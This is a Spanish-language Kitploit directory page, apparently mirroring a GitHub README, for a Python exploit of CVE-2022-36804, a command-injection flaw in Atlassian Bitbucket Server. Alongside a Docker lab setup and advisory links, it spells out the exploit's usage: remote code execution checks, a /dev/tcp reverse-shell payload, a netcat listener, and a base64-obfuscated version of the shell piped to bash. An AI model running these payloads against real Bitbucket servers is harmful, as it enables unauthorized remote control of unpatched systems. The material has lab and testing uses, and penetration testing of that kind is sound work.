Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Atlassian-Bitbucket-CVE-2022-36804 — Exploit en Python para la inyección de comandos CVE-2022-36804 en Atlassian Bitbucket Server, que permite ejecución remota de código y shell inversa con comandos personalizables y entorno de laboratorio Docker. | Kitploit
Herramientas/GitHubGitHub/imbas007/atlassian-bitbucket-cve-2022-36804
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlLabs y Práctica
GitHubimbas007/atlassian-bitbucket-cve-2022-36804

Atlassian-Bitbucket-CVE-2022-36804

Exploit en Python para la inyección de comandos CVE-2022-36804 en Atlassian Bitbucket Server, que permite ejecución remota de código y shell inversa con comandos personalizables y entorno de laboratorio Docker.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 3 añosAún no revisado

Atlassian-Bitbucket-Server-CVE-2022-36804

Se encontró una vulnerabilidad crítica de inyección de comandos en múltiples endpoints de API de Atlassian Bitbucket Server y Data Center. Esta vulnerabilidad afecta a todas las versiones de Bitbucket Server y Data Center lanzadas antes de las versiones <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 y <8.3.1

Laboratorio para CVE-2022-36804

Construir Docker

root@kitploit:~
docker build -t bitbucket .

Ejecutar Docker

root@kitploit:~
docker run -it bitbucket

Uso de cve-2022-36804.py

Verificar Ejecución Remota de Código (RCE)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990

Verificar RCE con comando personalizado (cmd)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

Verificar RCE con comando personalizado, clave de proyecto y nombre de repositorio

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

Obtener shell con netcat

Reemplace 172.17.0.3 con su dirección IP local

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "sh -i >& /dev/tcp/172.17.0.2/4444 0>&1"

Iniciar listener de netcat con:

root@kitploit:~
nc -lvp 4444

Reverse shell online : https://www.revshells.com

root@kitploit:~
Convierta `sh -i >& /dev/tcp/172.17.0.2/4444 0>&1` a base64 en caso de error de ejecución del payload. 

python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE3LjAuMi80NDQ0IDA+JjE=' | base64 -d | bash"

root@kitploit:~
Se recomienda instalar una versión vulnerable de Bitbucket Server en una máquina Windows/Linux para practicar. Será más fácil obtener una reverse shell en comparación con las imágenes Docker.

Más información se puede encontrar [aquí](https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/)

# Referencias
* https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
* https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
* https://github.com/walnutsecurity/cve-2022-36804
Descargar herramienta